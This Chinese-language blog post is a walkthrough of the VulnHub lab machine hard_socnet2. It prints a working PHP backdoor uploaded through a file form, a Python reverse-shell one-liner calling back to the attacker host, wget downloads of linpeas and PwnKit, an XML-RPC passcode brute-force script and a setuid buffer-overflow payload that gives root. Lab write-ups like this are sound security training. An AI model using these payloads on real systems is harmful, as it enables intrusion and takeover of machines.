OSCP实战靶机 | hard_socnet2

admin 2024年7月17日12:36:49评论16 views字数 9042阅读30分8秒阅读模式

坚持自律做最好的自己,每天一台,欢迎大家监督

OSCP实战靶机 | hard_socnet2

1-环境搭建

靶机下载地址:

https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

kali镜像:

kali-linux-2024.2-virtualbox-amd64

虚拟机环境:

Oracle VM VirtualBox 7.0

网络:

kali和靶机都选“仅主机(Host-Only)网络”先启动kali,再启动靶机,因为上一台靶机分的是104的ip,所以这次是105kaliIP是192.168.56.101靶机的IP是192.168.56.105

2-靶机实战

2-1-扫描枚举

端口扫描,命令参考OSCP | 信息收集章节的“6.3 主动信息收集”

sudo nmap -p 1-65535 192.168.56.105[sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 20:54 EDTNmap scan report for 192.168.56.105Host is up (0.000079s latency).Not shown: 65532 closed tcp ports (reset)PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http8000/tcp open  http-altMAC Address: 08:00:27:1C:9D:15 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds

发现22、80、8000端口开放,服务枚举,命令参考OSCP | 信息收集章节的“6.3 主动信息收集”

sudo nmap -p22,80,8000 -sT -A 192.168.56.105Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 20:55 EDTNmap scan report for 192.168.56.105Host is up (0.00036s latency).PORT     STATE SERVICE VERSION22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)|   256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)|_  256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)| http-cookie-flags: |   /: |     PHPSESSID: |_      httponly flag not set|_http-title: Social Network8000/tcp open  http    BaseHTTPServer 0.3 (Python 2.7.15rc1)|_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1|_http-title: Error response|_xmlrpc-methods: XMLRPC instance doesn't support introspection.MAC Address: 08:00:27:1C:9D:15 (Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT     ADDRESS1   0.36 ms 192.168.56.105OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 22.63 seconds

22端口为SSH服务,版本是OpenSSH 7.6p1,搜索可利用漏洞无果

80和8000是web服务

目录猜解,无有效漏洞发现

gobuster dir -u http://192.168.56.105 -w /usr/share/wordlists/dirb/common.txt -t 5===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.56.105[+] Method:                  GET[+] Threads:                 5[+] Wordlist:                /usr/share/wordlists/dirb/common.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.6[+] Timeout:                 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.hta                 (Status: 403) [Size: 293]/.htaccess            (Status: 403) [Size: 298]/.htpasswd            (Status: 403) [Size: 298]/database             (Status: 301) [Size: 319] [--> http://192.168.56.105/database/]/data                 (Status: 301) [Size: 315] [--> http://192.168.56.105/data/]/functions            (Status: 301) [Size: 320] [--> http://192.168.56.105/functions/]/images               (Status: 301) [Size: 317] [--> http://192.168.56.105/images/]/includes             (Status: 301) [Size: 319] [--> http://192.168.56.105/includes/]/index.php            (Status: 200) [Size: 10609]/resources            (Status: 301) [Size: 320] [--> http://192.168.56.105/resources/]/server-status        (Status: 403) [Size: 302]Progress: 4614 / 4615 (99.98%)===============================================================Finished===============================================================

8000端口目录猜解获报错,无有效利用信息

访问http://192.168.56.105发现有登录和注册页面,登录页面需要邮箱,无法获得邮箱信息,注册新账号进行登录尝

POST / HTTP/1.1Host: 192.168.56.105User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 248Origin: http://192.168.56.105Connection: closeReferer: http://192.168.56.105/Cookie: PHPSESSID=44ppo456mnncv9os7rsv723mopUpgrade-Insecure-Requests: 1userfirstname=test&userlastname=test&usernickname=test&userpass=test1234&userpassconfirm=test1234&useremail=test%40test.com&selectday=1&selectmonth=1&selectyear=1996&usergender=M&userhometown=test&userstatus=S&userabout=test&register=Create+Account

2-2-漏洞利用

登录后发现可以发帖、上传头像,尝试上传php的webshell,两处都可以上传webshell,下面是发帖上传

POST /home.php HTTP/1.1Host: 192.168.56.105User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------10620729983454150411412931893Content-Length: 799Origin: http://192.168.56.105Connection: closeReferer: http://192.168.56.105/home.phpCookie: PHPSESSID=44ppo456mnncv9os7rsv723mopUpgrade-Insecure-Requests: 1-----------------------------10620729983454150411412931893Content-Disposition: form-data; name="caption"test-----------------------------10620729983454150411412931893Content-Disposition: form-data; name="fileUpload"; filename="simple-backdoor.php"Content-Type: application/x-php<!-- Simple PHP backdoor by DK (http://michaeldaw.org) --><?phpif(isset($_REQUEST['cmd'])){        echo "<pre>";        $cmd = ($_REQUEST['cmd']);        system($cmd);        echo "</pre>";        die;}?>Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd<!--    http://michaeldaw.org   2006    -->-----------------------------10620729983454150411412931893Content-Disposition: form-data; name="post"Post-----------------------------10620729983454150411412931893--

获得webshell执行命令

curl http://192.168.56.105/data/images/posts/9.php?cmd=ls<!-- Simple PHP backdoor by DK (http://michaeldaw.org) --><pre>4.png5.png6.png9.php</pre>     

revshells.com生成python反弹shell的payload,使用webshell进行执行

http://192.168.56.105/data/images/posts/9.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

在卡kali的443端口获得反弹shell

nc -nvlp 443listening on [any] 443 ...connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 41786$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)$ pwdpwd/var/www/html/data/images/posts$ ls /homels /homesocnet$ cd /home/socnetcd /home/socnet$ lslsadd_record  monitor.py  peda$ 

3-权限提升

3-1-提权枚举

上传linpeas.sh运行,,命令参考“OSCP | Linux提权”章节的“17.1.3 自动枚举”

cd /tmpwget http://192.168.56.101/linpeas.shchmod +x ./linpeas.sh ./linpeas.sh

发现提示[CVE-2021-4034] PwnKit,与之前靶机一样

3-2-提权利用

这里我使用的是[CVE-2021-4034] PwnKit(https://github.com/ly4k/PwnKit)

wget http://192.168.56.101/PwnKitchmod +x ./PwnKit ./PwnKit iduid=0(root) gid=0(root) groups=0(root),33(www-data)

通过这几天打靶机基本发现,一个投机取巧的方法就是使用PwnKit提权,基本是2021年之前的linux都可以提权成功,但是靶机里一般也会预埋一些其他提权路径,这台靶机的提权就很有趣,下面简要说明,有兴趣的小伙伴可以自行尝试

前面拿到shell后,发现home目录下有socnet用户目录,查看文件发现

$ lslsadd_record  monitor.py  peda$ cat monitor.pycat monitor.py#my remote server management APIimport SimpleXMLRPCServerimport subprocessimport randomdebugging_pass = random.randint(1000,9999)def runcmd(cmd):    results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)    output = results.stdout.read() + results.stderr.read()    return outputdef cpu():    return runcmd("cat /proc/cpuinfo")def mem():    return runcmd("free -m")def disk():    return runcmd("df -h")def net():    return runcmd("ip a")def secure_cmd(cmd,passcode):    if passcode==debugging_pass:         return runcmd(cmd)    else:        return "Wrong passcode."server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))server.register_function(cpu)server.register_function(mem)server.register_function(disk)server.register_function(net)server.register_function(secure_cmd)server.serve_forever()$ ps aux |grep monitor.pyps aux |grep monitor.pysocnet     754  0.0  0.0   4628   780 ?        Ss   02:40   0:00 /bin/sh -c /usr/bin/python /home/socnet/monitor.pysocnet     770  0.0  1.3  43216 13508 ?        S    02:40   0:01 /usr/bin/python /home/socnet/monitor.pywww-data  1791  0.0  0.1  11464  1040 pts/0    S+   04:58   0:00 grep monitor.py

monitor.py可以以socnet权限执行系统命令但是,需要暴力破解passcode,执行命令成功后获得socnet权限

python的xmlrpc使用参考:https://docs.python.org/zh-cn/3/library/xmlrpc.html

import xmlrpc.clientpayload = '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")''''with xmlrpc.client.ServerProxy("http://192.168.56.105:8000/") as proxy:    for i in range(1000,10000):        res = str(proxy.secure_cmd(payload,i))        if not "Wrong" in res:            print(i)            print(res)            break

但其实意义不大,不用获得socnet权限,也是可以运行add_record的,通过gdb调试发现add_record存在缓冲区溢出,并且具备setuid, setgid功能,也就是说运行add_record执行命令就可以获得root权限

$ file ./add_recordfile ./add_record./add_record: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e3fa9a66b0b1e3281ae09b3fb1b7b82ff17972d8, not stripped$

通过gdb调试发现缓冲区溢出,构建payload,再将payload作为输入给add_record就可以获得root权限的shell了

python -c "import struct; print('aan1n1n1n' + 'A'*62 + struct.pack('I', 0x08048676))" > /tmp/rootshellcat /tmp/rootshell - | ./add_record

综上,提权有些难度,但不在OSCP考察范围之内,各位小伙伴可以自行实验参考

打靶方法有很多,大家多尝试多交流

如有好的靶机欢迎后台留言推荐

或者小伙伴有靶机实战笔记也可后台发我分享哈

坚持自律做最好的自己

原文始发于微信公众号(高级红队专家):OSCP实战靶机 | hard_socnet2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月17日12:36:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP实战靶机 | hard_socnet2https://cn-sec.com/archives/2965011.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息